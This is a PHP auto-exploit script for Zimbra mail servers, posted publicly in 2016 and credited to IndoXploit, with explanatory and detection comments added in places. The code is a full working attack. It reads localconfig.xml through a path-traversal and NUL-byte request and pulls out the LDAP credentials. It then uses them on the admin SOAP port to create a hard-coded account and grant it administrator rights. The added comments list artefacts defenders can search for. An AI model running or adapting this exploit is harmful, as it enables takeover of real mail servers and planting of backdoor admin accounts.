
NULL

a guest
Aug 15th, 2016
  1. <?php
  2. // Created by Tu5b0l3d - IndoXploit
  3. // big thx to: duardo Rubina H.
  4. // http://indoxploit.blogspot.co.id/2015/12/auto-exploiter-zimbra-php.html
  5.  
// Turn off PHP error reporting for the rest of the run, so failed file reads,
// missing array offsets and curl problems further down produce no diagnostics.
error_reporting(0);
  7. function ngecek($url,$post){
  8. $ch = curl_init ("$url");
  9. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  10. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  11. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  12. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  13. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  14. curl_setopt ($ch, CURLOPT_POST, 1);
  15. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  16. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  17. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  18. $data2 = curl_exec ($ch);
  19. return $data2;
  20. }
  21.  
  22. function nganu_body($toket,$req){
  23. $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
  24. return $body;
  25. }
// Main command-line flow. As written it:
//   1. reads host names from list.htm in the working directory,
//   2. requests a resource URL whose `skin` parameter carries a path traversal
//      to /opt/zimbra/conf/localconfig.xml followed by an encoded NUL byte,
//   3. pulls the zimbra_user and zimbra_ldap_password values out of the reply,
//   4. authenticates to the admin SOAP service on port 7071 with them,
//   5. creates a mailbox account and sets zimbraIsAdminAccount on it.
//
// Artefacts visible in this code that can be searched for on a Zimbra host:
//   - web requests with `skin=` containing `../` sequences and ending in `%00`,
//   - the fixed Firefox 32 User-Agent string,
//   - a CreateAccountRequest followed by a ModifyAccountRequest that sets
//     zimbraIsAdminAccount to TRUE, both sent to :7071/service/admin/soap,
//   - an account whose local part equals $user_baru below.
// NOTE(review): if the configuration file was disclosed, the LDAP password it
// holds should be treated as exposed; the admin port is presumably meant to be
// reachable from management networks only — confirm against the deployment.
if($argv[1]=="a"){
// Usage text is printed only when the first argument is exactly "a".
echo "\nusage: php $argv[0] victim.com\n\n";
}
else{
$buka=fopen("list.htm","r"); // open list.htm for reading
$size=filesize("list.htm"); // size of list.htm in bytes
$baca=fread($buka,$size); // read the whole of list.htm
$sites = explode("\n", $baca); // split the contents of list.htm on newlines
foreach($sites as $site){ // walk through the entries produced by the split above
}
// The loop body is empty, so $site here is the last element of $sites and
// everything below runs once, against that single entry.
$target = $site;
// Hard-coded name and password of the account created further down.
$user_baru = "firdytamvan";
$pwd_baru = "anonymous1704";
// Resource path whose `skin` query parameter points, through repeated `../`,
// at the Zimbra local configuration file; `%00` is an encoded NUL byte.
$lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
$link_lfi = "$target/$lfi";
echo "# $target\n";

// GET request for the URL above: redirects followed, gzip accepted, fixed
// User-Agent, cookies kept in "coker_log", certificate checks switched off.
$ch2 = curl_init ("$link_lfi");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
$ambil = curl_exec ($ch2);

// Split the response at the zimbra_user key and capture the <value> after it.
// The delimiter and pattern contain `"]="` and `a["` fragments, presumably
// because the reply wraps the file text in script assignments — confirm
// against a captured response.
$get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);

// Same extraction for the zimbra_ldap_password key.
$get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
// `!=` binds tighter than `or`, so this continues when the user capture is
// truthy or the password capture is not the empty string.
if($user[1] or $pwd[1] != ""){
echo "# Pulen nih...\n";

// Admin AuthRequest carrying the two captured values as account name and password.
$body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user[1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";

// Admin SOAP endpoint on port 7071 of the same host.
$link = "https://$target:7071/service/admin/soap";
$token = ngecek($link,$body);

// Capture the session token from the authentication response.
preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);

if($toket[1]==""){
// No token was captured from the response: report the failure.
echo "# gagal ngambil toket\n\n";
break;
}
else{

echo "# $toket[1]\n";
// The @ operator here wraps a plain string literal.
$req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>");
$body2 = nganu_body($toket[1],$req);

// List domains and keep the first zimbraDomainName found in the response.
$liat = ngecek($link,$body2);
preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
echo "# Creating Account...\n";
// CreateAccountRequest for <hard-coded name>@<first domain> with the hard-coded password.
$req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain[1]</name><password>$pwd_baru</password></CreateAccountRequest>";
$body3 = nganu_body($toket[1],$req2);

$liat2 = ngecek($link,$body3);

// Capture the id of the new account, then mark that account as an administrator.
preg_match('/account id="(.*)" name="/', $liat2, $new);
$req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
$body4 = nganu_body($toket[1],$req3);

// The response to the modify request is stored but never inspected, so the
// success message below is printed whatever the server answered.
$liat3 = ngecek($link,$body4);


echo "# Sukses\n";
echo "# Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";



}
}
else{
// Neither value could be extracted from the response.
echo "# ngk pulen\n";
}
}
  106. ?>